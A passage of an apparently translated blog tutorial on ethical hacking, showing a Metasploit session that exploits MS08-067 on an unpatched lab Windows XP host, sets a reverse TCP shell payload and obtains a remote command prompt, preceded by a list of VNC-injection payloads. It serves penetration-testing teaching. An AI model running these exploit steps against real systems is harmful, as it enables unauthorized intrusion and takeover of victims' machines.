windows\/upexec\/reverse_udp                                           normal  Windows Upload\/Execute, Reverse UDP Stager with UUID Support\n   windows\/vncinject\/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager\n   windows\/vncinject\/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager\n   windows\/vncinject\/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)\n   windows\/vncinject\/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/vncinject\/bind_named_pipe                                    normal  VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager\n   windows\/vncinject\/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)\n   windows\/vncinject\/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)\n   windows\/vncinject\/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/vncinject\/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)\n   windows\/vncinject\/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP\/HTTPS Stager\n   windows\/vncinject\/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)\n   windows\/vncinject\/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)\n   
windows\/vncinject\/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)\n   windows\/vncinject\/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/vncinject\/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager\n   windows\/vncinject\/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager\n   windows\/vncinject\/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)\n   windows\/vncinject\/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/vncinject\/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support\n   windows\/vncinject\/reverse_udp                                        normal  VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt; \n<\/pre>\n<\/blockquote>\n<\/div>\n<h4>Metasploit &#8211; Setting a Payload Manually<\/h4>\n<p>This example uses the payload <b>windows\/shell\/reverse_tcp<\/b>, which allows commands to be run as administrator on the target machine. There are two types of shell: bind shells and reverse shells.<br \/>\n<b>BIND SHELLS<\/b><br \/>\nA bind shell instructs the target to start a shell and listen on a specific port. 
The problem is that every firewall is configured by default to block all incoming traffic (all ports), so this technique would not be very effective.<br \/>\n<b>REVERSE SHELLS<\/b><br \/>\nWith a reverse shell, it is the attacker who has an open port and acts as the server; in this way the firewall rules can be bypassed.<\/p>\n<p>To use a payload, run the <b>set payload<\/b> command as follows:<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; set payload windows\/shell\/reverse_tcp\npayload =&gt; windows\/shell\/reverse_tcp\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>To see what information the program needs with this new setting, run the <b>show options<\/b> command again.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; show options\n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    10.10.10.7       yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nPayload options (windows\/shell\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST                      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   45  Windows XP SP3 Italian (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>As the command output shows, 
you need to enter your own IP address, the one from which the Windows machine is attacked; LHOST stands for local host.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; set lhost 10.10.10.5\nlhost =&gt; 10.10.10.5\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt; show options\n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    10.10.10.7       yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nPayload options (windows\/shell\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST     10.10.10.5\t      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   45  Windows XP SP3 Italian (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>We now have everything we need to run the <b>exploit<\/b> successfully with the chosen payload.<\/p>\n<h3>Metasploit &#8211; Exploit<\/h3>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; exploit\n\n[*] Started reverse TCP handler on 10.10.10.5:4444 \n[*] 10.10.10.7:445 - Attempting to trigger the vulnerability...\n[*] Encoded stage with x86\/shikata_ga_nai\n[*] Sending encoded stage (267 bytes) to 10.10.10.7\n[*] Command shell session 1 opened (10.10.10.5:4444 -&gt; 10.10.10.7:1037) at 2019-03-04 12:30:23 +0100\n\n\nC:\\WINDOWS\\system32&gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>As you can see, the exploit succeeded and 
a Windows command prompt appears, with which you can do practically anything on the victim's machine.<\/p>\n<h3>Partly based on the book: Penetration Testing &#8211; a hands-on introduction to Hacking by Georgia Weidman<\/h3>\n","protected":false},"excerpt":{"rendered":"<p>In this example we will test the security of a hypothetical client on the network running an old, unpatched operating system. The IP address of the client under test is 10.10.10.7; the operating system in use is Windows XP PRO SP3 and it is not updated. I deliberately chose an old, unpatched system to make&#8230;<\/p>","protected":false},"author":5,"featured_media":1805,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[268,49,297],"tags":[259,21,10,12,281,282,285,261,283,286,284,110,157],"class_list":["post-1803","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ethical-hacking-penetration-testing","category-sicurezza-informatica-anonimato","category-tutorials","tag-ethical-hacking","tag-exploit","tag-guida","tag-italiano","tag-kali-linux","tag-metasploit","tag-ms08-67","tag-nmap","tag-penetration-testing","tag-penetration-testing-a-hands-on-introduction-to-hacking","tag-sicurezza-informatica","tag-vulnerabilita","tag-windows"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ethical Hacking - Testing Security - Nmap and Metasploit &#8226; 
CHIT<\/title>\n<meta name=\"author\" content=\"chitblog\" \/>\n<!-- \/ Yoast SEO plugin. -->"}